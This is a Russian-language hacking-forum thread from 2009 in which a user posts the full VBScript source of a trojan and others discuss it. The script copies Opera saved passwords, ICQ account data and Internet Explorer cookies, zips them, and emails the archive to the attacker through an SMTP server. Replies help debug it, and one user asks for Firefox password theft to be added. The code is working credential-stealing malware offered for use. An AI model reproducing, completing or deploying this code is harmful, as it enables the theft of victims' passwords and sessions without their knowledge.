Простой троян на vbs

Discussion in 'Безопасность и Анонимность' started by hack-win32, 18 Nov 2009.

  1. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    скрипт на vbs для кражи паролей

    В написание трояна мне помогла статья "Pashkela" вот она , за что ему большое спасибо .
    Трой тырит пароли от: Opera , icq6 ,icq6.5 и куки от IE и высылает отчёт на мыло . Думаю с настройкой проблем не будет , если асеку включена то пароль от асеку непридёт . Сейчас продолжаю писать трояна до более лучшей версии , следующий трой будет тырить по более паролей .

    Code:
    Const FOF_SIMPLEPROGRESS = 256 
    Dim MySource, MyTarget, MyHex, MyBinary, i 
    Dim oShell, oCTF 
    Dim oFileSys 
    dim winShell 
    dim newfolderpath
    dim t
    On Error Resume Next
    'Создаем временную папку для записи нужных нам результатов (лучше, если название будет УНИКАЛЬНОЕ, чтобы не было конфликтов)
    '==========================================================
    h = Hour(Now)
    m = Minute(Now)
    s = Second(Now)
    t = date() & "-" & h & "-" & m & "-" & s
    dim filesys, newfolder 
    newfolderpath = "c:\12345" ' Название временной папки
    set filesys=CreateObject("Scripting.FileSystemObject") 
    If Not filesys.FolderExists(newfolderpath) Then 
       Set newfolder = filesys.CreateFolder(newfolderpath) 
    End If
    set filesys=Nothing
    Set newfolder=Nothing
    '============================================
    'тырим пароли от Оперы и icq 6 и icq6.5 , если асеку включена нехера непридёт
    Set FileSystemObject = CreateObject("scripting.filesystemobject") 
    set WshShell1 = WScript.CreateObject("WScript.Shell")
    str = "C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%")  & "\Application Data\Opera\Opera\profile\wand.dat" 
    If FileSystemObject.fileExists(str) = True Then 
    FileSystemObject.copyfile "C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%")  & "\Application Data\Opera\Opera\profile\wand.dat" ,"C:\12345\wand.dat" 
    FileSystemObject.copyfile "C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%")  & "\Application Data\ICQ\здесь icq который хотм стырить\Owner.mdb" ,"C:\12345\Owner.mdb"
    Else  
    End If
    '============================================
    ' Тырим куки IE
    Const ForReading = 1, ForWriting = 2, ForAppending = 8 
    Dim MyZipName 
    Dim oApp, oFolder, oFile 
    set WshShell1 = WScript.CreateObject("WScript.Shell") 
    filePath = "C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%")  & "\Cookies" 'Тут указываем, то что архивируем.
    set WshShell1 = Nothing
    MySource = filePath
    MyTarget = newfolderpath & "\" & t & "-" & "ie_cookie.zip"
    archPath_IE = t & "-" & "ie_cookie.zip"
    MyHex = Array(80, 75, 5, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) 
    For i = 0 To UBound(MyHex) 
    MyBinary = MyBinary & Chr(MyHex(i)) 
    Next 
    Set oShell = CreateObject("WScript.Shell") 
    Set oFileSys = CreateObject("Scripting.FileSystemObject") 
    Set oCTF = oFileSys.CreateTextFile(MyTarget, True) 
    oCTF.Write MyBinary 
    oCTF.Close 
    Set oCTF = Nothing 
    Set oApp = CreateObject("Shell.Application") 
    Set oFolder = oApp.NameSpace(MySource) 
    If Not oFolder Is Nothing Then 
    oApp.NameSpace(MyTarget).CopyHere oFolder.Items 
    End If 
    wScript.Sleep(5000) 
    Set oFile = Nothing 
    On Error Resume Next 
    Do While (oFile Is Nothing) 
    Set oFile = oFileSys.OpenTextFile(MyTarget, ForAppending, False) 
    If Err.number <> 0 then 
    Err.Clear 
    wScript.Sleep 3000 
    End If 
    Loop 
    Set oFile=Nothing 
    Set oFileSys=Nothing
    '============================================ 
    'скрипт который архивирует папку 12345 с пасами
    Dim arrResult
    arrResult = ZipFolder( "C:\12345", "C:\12345.zip" )
    If arrResult(0) <> 0 Then
        WScript.Echo "ERROR " & Join( arrResult, vbCrLf )
    End If
    Function ZipFolder( myFolder, myZipFile )
        Dim objApp, objFSO, objTxt
        Const ForWriting = 2
        If Right( myFolder, 1 ) <> "\" Then
            myFolder = my Folder & "\"
        End If
        On Error Resume Next
        Set objFSO = CreateObject( "Scripting.FileSystemObject" )
        Set objTxt = objFSO.OpenTextFile( myZipFile, ForWriting, True )
        objTxt.Write "PK" & Chr(5) & Chr(6) & String( 18, Chr(0) )
        objTxt.Close
        Set objTxt = Nothing
        Set objFSO = Nothing
        If Err Then
            ZipFolder = Array( Err.Number, Err.Source, Err.Description )
            Err.Clear
            On Error Goto 0
            Exit Function
        End If
        Set objApp = CreateObject( "Shell.Application" )
        objApp.NameSpace( myZipFile ).CopyHere objApp.NameSpace( myFolder ).Items
        If Err Then
            ZipFolder = Array( Err.Number, Err.Source, Err.Description )
            Set objApp = Nothing
            Err.Clear
            On Error Goto 0
            Exit Function
        End If
        Do Until objApp.NameSpace( myZipFile ).Items.Count _
               = objApp.NameSpace( myFolder  ).Items.Count
            WScript.Sleep 200
        Loop
        Set objApp = Nothing
        If Err Then
            ZipFolder = Array( Err.Number, Err.Source, Err.Description )
            Err.Clear
            On Error Goto 0
            Exit Function
        End If
        On Error Goto 0
        ZipFolder = Array( 0, "", "" )
    End Function
    '==============================================
    'отправка на мыло
    Set S = CreateObject("Wscript.Shell")
    set FSO=createobject("scripting.filesystemobject")
    Call SendPost("smtp.mail.ru","[COLOR=Red]куды придёт отчёт[/COLOR]@mail.ru","[COLOR=Red]левое мыло@mail.ru[/COLOR]","passi_lamera","hacked_by_hack-win32")
    Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,strBody)
    Set iMsg=CreateObject("CDO.Message")
    Set iConf=CreateObject("CDO.Configuration")
    Set Flds=iConf.Fields
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="логин левого мыла без "@mail.ru""
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="[COLOR=Red]пароль левого мыла[/COLOR]"
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="[COLOR=Red]smtp.mail.ru[/COLOR]"
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
    Flds.Update
    iMsg.Configuration=iConf
    iMsg.To=strTo
    iMsg.From=strFrom
    iMsg.Subject=strSubject
    iMsg.TextBody=strBody
    iMsg.AddAttachment "C:\ 12345.zip"
    iMsg.Send
    End Function
    Set iMsg=Nothing
    Set iConf=Nothing
    Set Flds=Nothing
    в коде несколько умышленных ошибок , а точнее кое где допущены пробелы .
     
    #1 hack-win32, 18 Nov 2009
    Last edited: 19 Nov 2009
    2 people like this.
  2. Deathdreams

    Deathdreams Elder - Старейшина

    Joined:
    8 Nov 2008
    Messages:
    342
    Likes Received:
    116
    Reputations:
    5
    <...>filePath = "C:\Documents and Settings\" <...>

    уверен?
     
  3. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    я пока новичок в vbs , у меня всё работало , если неправельно , поправь
     
  4. sTe[A]LeR

    sTe[A]LeR Member

    Joined:
    10 Sep 2009
    Messages:
    17
    Likes Received:
    12
    Reputations:
    5
    Строка 125 символ 62 предполагается наличие ')'
     
  5. jenyavlg

    jenyavlg Banned

    Joined:
    25 Aug 2007
    Messages:
    397
    Likes Received:
    19
    Reputations:
    0
    еще добавь чтоб от фаерфокса пи*дил
     
  6. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    ага , пишу следующий cкрипт , он будет по более тырить
     
    #6 hack-win32, 18 Nov 2009
    Last edited: 19 Nov 2009
  7. ErrorNeo

    ErrorNeo Elder - Старейшина

    Joined:
    2 May 2009
    Messages:
    923
    Likes Received:
    835
    Reputations:
    402
    прочти правила форума, переименуй тему и добавь защиту от скрипт-киддисов
    как минимум

    >тыц<
     
    #7 ErrorNeo, 18 Nov 2009
    Last edited: 18 Nov 2009
  8. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    + filePath = "C:\Documents and Settings\" - очень нехорошо :(
     
  9. [Abbath]

    [Abbath] Member

    Joined:
    1 Oct 2009
    Messages:
    43
    Likes Received:
    19
    Reputations:
    5
    smtp.mail.ru что вмсесто этого писать?
     
  10. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    это не надо заменять , если мыло на маил
     
    #10 hack-win32, 19 Nov 2009
    Last edited: 19 Nov 2009
  11. [Abbath]

    [Abbath] Member

    Joined:
    1 Oct 2009
    Messages:
    43
    Likes Received:
    19
    Reputations:
    5
    ясн а де пробелы добавлять?)
     
  12. begin_end

    begin_end

    Joined:
    4 Jan 2007
    Messages:
    252
    Likes Received:
    571
    Reputations:
    470
    hack-win32, твоя тема, возможно, несколько противоречит ПРАВИЛАМ ФОРУМА:

    ВНИМАНИЕ!
    На форуме Античата запрещена тематика пинчей, отчетов, троянов и крипторов! Такие темы будут сразу удаляться без предупреждения!


    Правила форума Античат, см. после п. 16.
     
    _________________________
  13. POS_troi

    POS_troi Elder - Старейшина

    Joined:
    1 Dec 2006
    Messages:
    1,569
    Likes Received:
    466
    Reputations:
    108

    Он за то что ДокументСетингс и другие системные катологи не обязательно будет на диске "C"

    с одной стороны ты прав а с другой он - типо он не продает и не распространяет а выставил на суд пользователей свою работу. хотя это решать Админам и Модерам
     
  14. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    читал я все правила , сначало создал тему потом прочёл правила , затем редактировал на "скрипт на вбс для кражи паролей" допустил пару пробелов в коде , а вот немогу само название темы изменить
     
  15. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    я поместил тему в "наши статьи" и кто-то переместил её сюда
     
  16. Dark Koder

    Dark Koder New Member

    Joined:
    23 Dec 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    а разве вы не занимаетесь тем же,только не разглашая етого? ;)
     
Loading...